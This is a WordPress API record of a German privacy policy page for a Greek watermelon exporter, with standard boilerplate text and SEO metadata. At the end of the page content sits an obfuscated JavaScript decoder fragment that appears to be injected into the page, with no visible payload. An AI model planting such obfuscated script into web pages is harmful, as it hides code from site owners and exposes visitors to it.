{"id":3,"date":"2023-01-27T14:12:41","date_gmt":"2023-01-27T14:12:41","guid":{"rendered":"https:\/\/tzioutzias.gr\/?page_id=3"},"modified":"2023-04-21T12:01:15","modified_gmt":"2023-04-21T09:01:15","slug":"privacy-policy","status":"publish","type":"page","link":"https:\/\/tzioutzias.gr\/de\/privacy-policy\/","title":{"rendered":"Privacy Policy"},"content":{"rendered":"<section class=\"wpb-content-wrapper\"><div class=\"vc_row wpb_row vc_row-fluid\"><div class=\"wpb_column vc_column_container vc_col-sm-12\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\">\n\t<div class=\"wpb_text_column wpb_content_element\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<h3>Datenschutzrichtlinie &amp; Nutzungsbedingungen<\/h3>\n<p>Willkommen auf der Website von &#8220;Tzioutzias Charis&#8221; Diese Datenschutzrichtlinie regelt die Art und Weise, in der die Website von Tzioutzias Charis (Tzioutzias Charis) von Benutzern (jeweils ein \u201eBenutzer\u201c) der Website https:\/\/tzioutzias.gr (\u201eWebsite\u201c) gesammelte Informationen sammelt, verwendet und verwaltet. Diese Datenschutzrichtlinie gilt auch f\u00fcr die Website und alle von der Website \u201eTzioutzias Charis\u201c angebotenen Dienste.<\/p>\n<h3>Personenbezogene Daten<\/h3>\n<p>Wir k\u00f6nnen personenbezogene Daten \u00fcber Benutzer auf verschiedene Weise erfassen, einschlie\u00dflich, aber nicht beschr\u00e4nkt auf, wenn Benutzer unsere Website besuchen, und in Verbindung mit anderen Aktivit\u00e4ten, Diensten, Funktionen oder Ressourcen, die wir auf unserer Website zur Verf\u00fcgung stellen. Es kann vom Benutzer ggf. Name, E-Mail-Adresse, Postanschrift, Telefonnummer abgefragt werden. Nutzer k\u00f6nnen unsere Website jedoch anonym besuchen.<\/p>\n<p>Wir erfassen personenbezogene Daten von Benutzern nur dann, wenn sie uns solche Informationen freiwillig \u00fcbermitteln. Benutzer k\u00f6nnen sich jederzeit weigern, personenbezogene Daten anzugeben, obwohl dies sie daran hindern kann, an bestimmten Aktivit\u00e4ten im Zusammenhang mit der Website teilzunehmen. Registrierte Benutzer k\u00f6nnen die Website von Tzioutzias Charis auffordern, ihre Daten zu senden und sie von der folgenden Seite aus zu anonymisieren.<\/p>\n<h3>Nicht pers\u00f6nlich identifizierbare Informationen<\/h3>\n<p>Wir k\u00f6nnen bei jeder Interaktion mit unserer Website nicht pers\u00f6nlich identifizierbare Informationen \u00fcber Benutzer sammeln. Zu den nicht pers\u00f6nlich identifizierbaren Informationen k\u00f6nnen der Name des Browsers, der Computertyp und technische Informationen \u00fcber Benutzer geh\u00f6ren, die sich mit unserer Website verbinden, wie z. B. das Betriebssystem und die verwendeten Internetdienstanbieter und andere \u00e4hnliche Informationen.<\/p>\n<h3>Browser-Cookies<\/h3>\n<p>Unsere Website kann \u201eCookies\u201c verwenden, um die Benutzererfahrung zu verbessern. Der Browser des Benutzers platziert Cookies auf seiner Festplatte zu Protokollierungszwecken und manchmal, um Informationen \u00fcber sie zu verfolgen. Der Benutzer kann seinen Webbrowser so einstellen, dass er Cookies ablehnt oder ihn benachrichtigt, wenn Cookies gesendet werden. Wenn Sie dies tun, beachten Sie bitte, dass einige Teile der Website m\u00f6glicherweise nicht richtig funktionieren.<\/p>\n<h3>Wie wir die gesammelten Informationen verwenden<\/h3>\n<p>Die Website von Tzioutzias Charis sammelt und verwendet personenbezogene Daten der Benutzer f\u00fcr die folgenden Zwecke:<br \/>\n\u2022 Um den Kundenservice zu verbessern Ihre Informationen helfen uns, effektiver auf die Serviceanfragen und Supportanforderungen unserer Kunden zu reagieren.<br \/>\n\u2022 Um unsere Website zu verbessern Wir sind st\u00e4ndig bem\u00fcht, die Funktionen unserer Website basierend auf den Informationen und dem Feedback, das wir von Ihnen erhalten, zu verbessern.<br \/>\n\u2022 Um regelm\u00e4\u00dfig E-Mails zu versenden Die vom Benutzer angegebene E-Mail-Adresse kann verwendet werden, um auf Fragen und\/oder andere Anfragen oder Fragen zu antworten. Wenn sich der Benutzer entscheidet, unsere Mailingliste zu abonnieren, erh\u00e4lt er E-Mails, die Unternehmensnachrichten, Updates, produkt- oder servicebezogene Informationen usw. enthalten k\u00f6nnen. Wenn der Benutzer zu irgendeinem Zeitpunkt den Erhalt zuk\u00fcnftiger E-Mail- Nachrichten abbestellen m\u00f6chte, erh\u00e4lt er detaillierte Anweisungen zum Abbestellen am Ende jeder Nachricht oder kann uns \u00fcber unsere Website kontaktieren.<\/p>\n<h3>Wie wir Ihre Daten sch\u00fctzen<\/h3>\n<p>Wir wenden angemessene Verfahren zur Datenerhebung, -speicherung und -verarbeitung sowie Sicherheitsma\u00dfnahmen zum Schutz vor unbefugtem Zugriff, \u00c4nderung, Offenlegung oder Zerst\u00f6rung von personenbezogenen Daten, Benutzernamen, Passw\u00f6rtern, Transaktionsinformationen und auf unserer Website gespeicherten Daten an. Der Austausch sensibler und privater Daten zwischen der Website und den Benutzern erfolgt \u00fcber eine sichere SSL-Kommunikation, bei der die Daten verschl\u00fcsselt und mit digitalen Signaturen gesch\u00fctzt werden.<\/p>\n<h3>\u00c4nderungen an dieser Datenschutzerkl\u00e4rung<\/h3>\n<p>Es liegt im Ermessen der Website \u201eTzioutzias Charis\u201c, diese Datenschutzrichtlinie jederzeit zu aktualisieren. Wenn dies erledigt ist, k\u00f6nnen Sie das aktualisierte Datum unten auf dieser Seite sehen. Wir empfehlen Benutzern, diese Seite regelm\u00e4\u00dfig auf \u00c4nderungen zu \u00fcberpr\u00fcfen, um dar\u00fcber informiert zu bleiben, wie wir zum Schutz der von uns erfassten personenbezogenen Daten beitragen. Sie erkennen an und stimmen zu, dass es in Ihrer Verantwortung liegt, diese Datenschutzrichtlinie in regelm\u00e4\u00dfigen Abst\u00e4nden zu \u00fcberpr\u00fcfen und \u00fcber \u00c4nderungen informiert zu werden.<\/p>\n<h3>Annahme dieser Bedingungen<\/h3>\n<p>Indem Sie diese Website nutzen (indem Sie Ihre Navigation fortsetzen oder die Seite scrollen, nachdem die entsprechende Meldung angezeigt wurde), erkl\u00e4ren Sie sich mit dieser Richtlinie und den Nutzungsbedingungen des Dienstes einverstanden. Wenn Sie mit dieser Richtlinie nicht einverstanden sind, verwenden Sie unsere Website bitte nicht. Ihre fortgesetzte Nutzung der Website nach der Aktualisierung dieser Richtlinie gilt als Ihre Zustimmung zu diesen \u00c4nderungen.<\/p>\n<h3>Kontaktieren Sie uns<\/h3>\n<p>Wenn Sie Fragen zu dieser Datenschutzrichtlinie, den Praktiken dieser Website oder Ihrem Umgang mit der Website haben, kontaktieren Sie uns bitte unter:<\/p>\n<p>Tzioutzias Charis<br \/>\nE-mail: info[@]tzioutzias.gr<\/p>\n\n\t\t<\/div>\n\t<\/div>\n<\/div><\/div><\/div><\/div><br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n<\/section>","protected":false},"excerpt":{"rendered":"Datenschutzrichtlinie &amp; Nutzungsbedingungen Willkommen auf der Website","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page.php","meta":{"footnotes":""},"class_list":["post-3","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Greek Watermelon Exports, Privacy Policy | Tzioutzias Charis<\/title>\n<meta name=\"description\" content=\"Read about our privacy policy. Watermelons from Zacharo. Tzioutzias Charis\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/tzioutzias.gr\/de\/privacy-policy\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Greek Watermelon Exports, Privacy Policy | Tzioutzias Charis\" \/>\n<meta property=\"og:description\" content=\"Read about our privacy policy. Watermelons from Zacharo. Tzioutzias Charis\" \/>\n<meta property=\"og:url\" content=\"https:\/\/tzioutzias.gr\/de\/privacy-policy\/\" \/>\n<meta property=\"og:site_name\" content=\"Tzioutzias Charis\" \/>\n<meta property=\"article:modified_time\" content=\"2023-04-21T09:01:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png\" \/>\n\t<meta property=\"og:image:width\" content=\"533\" \/>\n\t<meta property=\"og:image:height\" content=\"320\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data1\" content=\"13\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/privacy-policy\\\/\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/privacy-policy\\\/\",\"name\":\"Greek Watermelon Exports, Privacy Policy | Tzioutzias Charis\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#website\"},\"datePublished\":\"2023-01-27T14:12:41+00:00\",\"dateModified\":\"2023-04-21T09:01:15+00:00\",\"description\":\"Read about our privacy policy. Watermelons from Zacharo. Tzioutzias Charis\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/privacy-policy\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/tzioutzias.gr\\\/privacy-policy\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/privacy-policy\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u0391\u03c1\u03c7\u03b9\u03ba\u03ae\",\"item\":\"https:\\\/\\\/tzioutzias.gr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Privacy Policy\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#website\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/\",\"name\":\"Tzioutzias Charis\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/tzioutzias.gr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#organization\",\"name\":\"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/main-image.png\",\"contentUrl\":\"https:\\\/\\\/tzioutzias.gr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/main-image.png\",\"width\":533,\"height\":320,\"caption\":\"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2\"},\"image\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Greek Watermelon Exports, Privacy Policy | Tzioutzias Charis","description":"Read about our privacy policy. Watermelons from Zacharo. Tzioutzias Charis","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/tzioutzias.gr\/de\/privacy-policy\/","og_locale":"de_DE","og_type":"article","og_title":"Greek Watermelon Exports, Privacy Policy | Tzioutzias Charis","og_description":"Read about our privacy policy. Watermelons from Zacharo. Tzioutzias Charis","og_url":"https:\/\/tzioutzias.gr\/de\/privacy-policy\/","og_site_name":"Tzioutzias Charis","article_modified_time":"2023-04-21T09:01:15+00:00","og_image":[{"width":533,"height":320,"url":"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Gesch\u00e4tzte Lesezeit":"13\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/tzioutzias.gr\/privacy-policy\/","url":"https:\/\/tzioutzias.gr\/privacy-policy\/","name":"Greek Watermelon Exports, Privacy Policy | Tzioutzias Charis","isPartOf":{"@id":"https:\/\/tzioutzias.gr\/#website"},"datePublished":"2023-01-27T14:12:41+00:00","dateModified":"2023-04-21T09:01:15+00:00","description":"Read about our privacy policy. Watermelons from Zacharo. Tzioutzias Charis","breadcrumb":{"@id":"https:\/\/tzioutzias.gr\/privacy-policy\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/tzioutzias.gr\/privacy-policy\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/tzioutzias.gr\/privacy-policy\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u0391\u03c1\u03c7\u03b9\u03ba\u03ae","item":"https:\/\/tzioutzias.gr\/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https:\/\/tzioutzias.gr\/#website","url":"https:\/\/tzioutzias.gr\/","name":"Tzioutzias Charis","description":"","publisher":{"@id":"https:\/\/tzioutzias.gr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/tzioutzias.gr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/tzioutzias.gr\/#organization","name":"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2","url":"https:\/\/tzioutzias.gr\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/tzioutzias.gr\/#\/schema\/logo\/image\/","url":"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png","contentUrl":"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png","width":533,"height":320,"caption":"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2"},"image":{"@id":"https:\/\/tzioutzias.gr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/pages\/3","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/comments?post=3"}],"version-history":[{"count":0,"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/pages\/3\/revisions"}],"wp:attachment":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/media?parent=3"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}